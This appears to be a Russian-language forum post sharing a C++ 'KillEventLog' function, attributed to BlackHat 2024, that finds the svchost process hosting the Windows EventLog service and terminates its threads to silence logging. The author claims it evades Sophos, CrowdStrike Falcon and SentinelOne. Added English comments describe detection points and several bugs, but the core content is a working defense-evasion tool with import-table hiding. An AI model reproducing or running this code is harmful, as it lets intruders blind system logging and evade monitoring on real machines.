KillEventLog с BlackHat 2024
Тестил на софос, фалькон, сентинел без алертов.
C++:
// Terminates every thread of the svchost.exe that hosts the "EventLog" service
// (a log-tampering / defense-evasion primitive).
//
// Flow, as written: resolve the EventLog host PID through the SCM, open the
// process for read, enumerate all threads on the box, and for each thread owned
// by that PID read a tag value out of its TEB and then TerminateThread() it.
// Returns 0 on completion (also when nothing was killed), -1 on an early failure.
//
// Defender notes (what this leaves on the wire):
//  - a service-status query on "EventLog" followed by cross-process
//    OpenThread(THREAD_ALL_ACCESS)/TerminateThread against the EventLog host
//    from an unrelated process; process/thread-access telemetry (e.g. Sysmon
//    ProcessAccess-style events, EDR handle-open hooks) is the detection point;
//  - the Event Log service stops writing while its host process stays alive,
//    so a sudden gap in Windows event logs with no corresponding service stop
//    is the forensic signature; monitoring EventLog service health and
//    forwarding logs off-host shortens the blind window;
//  - the hard-coded TEB offsets below are Windows-version dependent and the
//    I_QueryTagInformation() lookup is effectively unused, so on a host where
//    EventLog shares its svchost with other services this kills those too.
//
// External names used but not defined in this listing: win32, sOpenP,
// pNtQueryInformationThread, I_QueryTagInformation, SC_SERVICE_TAG_QUERY,
// ServiceNameFromTagInformation, THREAD_BASIC_INFORMATION.
int KillEventLogThreads()
{
// Handles to the local SCM and the EventLog service. Neither return value is
// checked and neither handle is ever closed with CloseServiceHandle().
SC_HANDLE hSVCM = OpenSCManagerA(".", NULL, MAXIMUM_ALLOWED);
SC_HANDLE hEventLogService = OpenServiceA(hSVCM, "EventLog", MAXIMUM_ALLOWED);
SERVICE_STATUS_PROCESS svcStatus = {};
DWORD bytesNeeded = 0;
// SC_STATUS_PROCESS_INFO yields dwProcessId of the hosting svchost.exe.
if (!QueryServiceStatusEx(hEventLogService, SC_STATUS_PROCESS_INFO, (LPBYTE)&svcStatus, sizeof(svcStatus), &bytesNeeded))
{
printf("[!] Unable to get PID of svchost.exe that hosts EventLog service (%u)\n", GetLastError());
return -1;
}
DWORD hEventLogServicePID = svcStatus.dwProcessId;
printf("\n[*] Targeting svchost.exe hosting eventlog service with PID: %d\n", (int)hEventLogServicePID);
// OpenProcess is resolved at runtime through GetProcAddress rather than linked
// statically; presumably to keep it out of the import table (win32 / sOpenP are
// defined elsewhere). Import-table inspection alone will not show this call.
using OpenProcessPrototype = HANDLE(WINAPI*)(DWORD, BOOL, DWORD);
OpenProcessPrototype OpenProcess = (OpenProcessPrototype)GetProcAddress(GetModuleHandleA(win32), sOpenP);
HANDLE hSVC = NULL;
// Only PROCESS_VM_READ is requested on the host process; the destructive step
// later goes through per-thread handles, not this one.
hSVC = OpenProcess(PROCESS_VM_READ, FALSE, hEventLogServicePID);
if (hSVC == NULL)
{
printf("[!] Failed to get a handle to svchost.exe that hosts EventLog service (%u)\n", GetLastError());
return -1;
}
int killcount = 0;
HANDLE hThreadSnap = INVALID_HANDLE_VALUE;
THREADENTRY32 te32;
THREAD_BASIC_INFORMATION threadBasicInfo;
BOOL bIsWoW64 = FALSE;
DWORD dwOffset = NULL;
PVOID subProcessTag = NULL;
// System-wide thread snapshot; filtered by owner PID in the loop below.
hThreadSnap = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hThreadSnap == INVALID_HANDLE_VALUE)
return -1; // hSVC is leaked on this path
te32.dwSize = sizeof(THREADENTRY32);
if (!Thread32First(hThreadSnap, &te32))
{
printf("Thread32First() and we died (%u)\n", GetLastError());
CloseHandle(hThreadSnap);
return -1; // hSVC is leaked on this path
}
do
{
if (te32.th32OwnerProcessID == hEventLogServicePID)
{
// Cross-process thread handle with full access: this open, and the
// TerminateThread below, are the observable events of the technique.
HANDLE hThread = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
if (hThread == NULL)
{
printf("[!] Failed to get a handle to one of EventLog service Threads (%u)\n", GetLastError());
return -1; // hSVC and hThreadSnap are leaked on this path
}
// Information class 0 (ThreadBasicInformation) — only pTebBaseAddress is
// used afterwards. `status` is never examined.
NTSTATUS status = pNtQueryInformationThread(hThread, (THREAD_INFORMATION_CLASS)0, &threadBasicInfo, sizeof(threadBasicInfo), NULL);
// NOTE(review): the BOOL *return* of IsWow64Process (call succeeded or not)
// is stored into bIsWoW64, which is also the out-parameter — so the
// branch below is driven by call success, not by the target's bitness.
bIsWoW64 = IsWow64Process(hSVC, &bIsWoW64);
if (!bIsWoW64)
{
dwOffset = 0x1720; // hard-coded TEB offset, presumably SubProcessTag (64-bit layout) — version dependent
}
else
{
dwOffset = 0xf60; // hard-coded TEB offset, presumably SubProcessTag (32-bit layout) — version dependent
}
// Reads one pointer-sized value out of the remote TEB; result not checked.
ReadProcessMemory(hSVC, ((PBYTE)threadBasicInfo.pTebBaseAddress + dwOffset), &subProcessTag, sizeof(subProcessTag), NULL);
SC_SERVICE_TAG_QUERY query = { 0 };
// Gate is only "the function pointer is non-null": the tag lookup's result
// (query.pBuffer, the return value) is never inspected or freed, so every
// thread owned by the PID is terminated regardless of which service it serves.
if (I_QueryTagInformation)
{
query.processId = (ULONG)hEventLogServicePID;
query.serviceTag = (ULONG)subProcessTag;
query.reserved = 0;
query.pBuffer = NULL;
I_QueryTagInformation(NULL, ServiceNameFromTagInformation, &query);
printf("[+] Thread FOUND: TID -> %d", te32.th32ThreadID);
// Exit code passed as NULL (pointer constant used for a DWORD).
if (TerminateThread(hThread, NULL))
{
printf("\tTerminated!\n");// , te32.th32ThreadID);
killcount++;
}
else
{
printf("\n[!] Failed to terminate EventLog thread (TID: %d) !\n", te32.th32ThreadID);
}
}
CloseHandle(hThread);
}
} while (Thread32Next(hThreadSnap, &te32));
CloseHandle(hThreadSnap);
CloseHandle(hSVC);
// hSVCM / hEventLogService remain open here.
if (killcount == 0)
{
printf("[+] Event Logger is Either NOT running or Already Killed Previously!\n");
}
return 0;
}